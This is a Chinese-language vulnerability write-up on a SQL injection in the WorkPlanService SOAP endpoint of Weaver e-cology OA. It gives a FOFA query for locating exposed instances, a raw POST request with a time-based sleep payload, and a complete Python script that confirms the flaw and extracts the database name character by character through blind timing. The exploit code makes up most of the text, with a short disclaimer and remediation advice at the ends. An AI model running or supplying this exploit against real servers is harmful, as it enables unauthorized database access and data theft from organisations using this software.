0x00、声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用,请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者无关。请遵守《中华人民共和国网络安全法》。
中华人民共和国网络安全法
第二十七条 规定
任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。
0x01、产品概述
泛微e-cology依托全新的设计理念,全新的管理思想,为中大型组织创建全新的高效协同办公环境。标准化产品+个性化开发,适合集团型组织OA软件
0x02、漏洞描述:
泛微e-cology平台 WorkPlanService接口存在SQL注入。
0x03、资产测绘
FOFA:app="泛微-EOffice"||app="泛微-OA(e-cology)"
0x04、漏洞复现
4.1、数据包测试
1、POST请求包
POST /services/WorkPlanService HTTP/1.1
HOST: l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:deleteWorkPlan>
<!--type: string-->
<web:in0>(select 111 from (select sleep(5))aaaa)</web:in0>
<!--type: int-->
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>
测试截图:
4.2、py脚本
探测是否存在漏洞并遍历出其数据库名
# -*- coding: utf-8 -*-
import time
import sys
import requests
# 禁用不安全请求的警告
requests.packages.urllib3.disable_warnings()
headers={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a1b)XWEB/9165',
'Content-Type': 'text/xml;charset=UTF-8'
}
def len_(url0,sql_0):
len_l = 0
for len in range(1,20):
try:
data = f'''<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:web="webservices.workplan.weaver.com.cn"
>
<soapenv:Header />
<soapenv:Body>
<web:deleteWorkPlan>
<!--type: string-->
<web:in0>(select 111 from (select (if({len}=(select length({sql_0})),sleep(3),1)))aaaa)</web:in0>
<!--type: int-->
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>'''
s = time.time()
req = requests.post(data=data,url=url0,headers=headers,timeout=20)
e = time.time()
if e-s>3 and e-s<4:
len_l = len
print(f"the len({sql_0}) is : ",len)
return len_l
except requests.exceptions.RequestException as e1:
print("An error occurred:", e1)
if len_l==0:
print("no result!!!maybe have error!!")
sys.exit()
def name_(url0,len_l,sql_0):
nm_chr = []
for i in range(len_l+1):
for nm_asc in range(64,127):
try:
data = f'''<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:web="webservices.workplan.weaver.com.cn"
>
<soapenv:Header />
<soapenv:Body>
<web:deleteWorkPlan>
<!--type: string-->
<web:in0>(select 111 from (select (if({nm_asc}=(select ascii(substring({sql_0},{i},1))),sleep(3),1)))aaaa)</web:in0>
<!--type: int-->
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>
'''
s = time.time()
req = requests.post(data=data,url=url0,headers=headers,timeout=20)
e = time.time()
if e-s>3 and e-s<4:
print(f"on the {i} is:",chr(nm_asc))
nm_chr.append(chr(nm_asc))
break
except requests.exceptions.RequestException as e1:
print("An error occurred:", e1)
if len(nm_chr)!=len_l:
print(f"find name fail or have error!!!! please check !!!")
sys.exit()
print("find the name is:",''.join(nm_chr))
def vuln_t(url):
data = '''<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:web="webservices.workplan.weaver.com.cn"
>
<soapenv:Header />
<soapenv:Body>
<web:deleteWorkPlan>
<!--type: string-->
<web:in0>(select 111 from (select (if(1=1,sleep(3),1)))aaaa)</web:in0>
<!--type: int-->
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>
'''
try:
s =time.time()
rep = requests.post(data=data,url=url,headers=headers,timeout=20)
ed = time.time()
if ed-s>3 and ed-s<5:
print(f"find {url} exists vuln!!!")
return 1
except requests.exceptions.RequestException as e1:
print("An error occurred:", e1)
print("maybe no vuln!!")
return 0
if __name__ == "__main__":
url = "https://127.0.0.1"
url0 = f"{url}/services/WorkPlanService"
if vuln_t(url0):
sql_0 = "schema()"
name_(url0,len_(url0,sql_0),sql_0)
print("complete!!!")
0x05、修复建议
临时缓解方案
使用预编译语句,绑定变量;输入验证和过滤;使用防护设备进行防护。如非必要,不要将受影响系统放置在公网上。
升级修复方案
官方已发布新版本修复漏洞,建议尽快访问官网或联系官方售后支持获取版本升级安装包或补丁。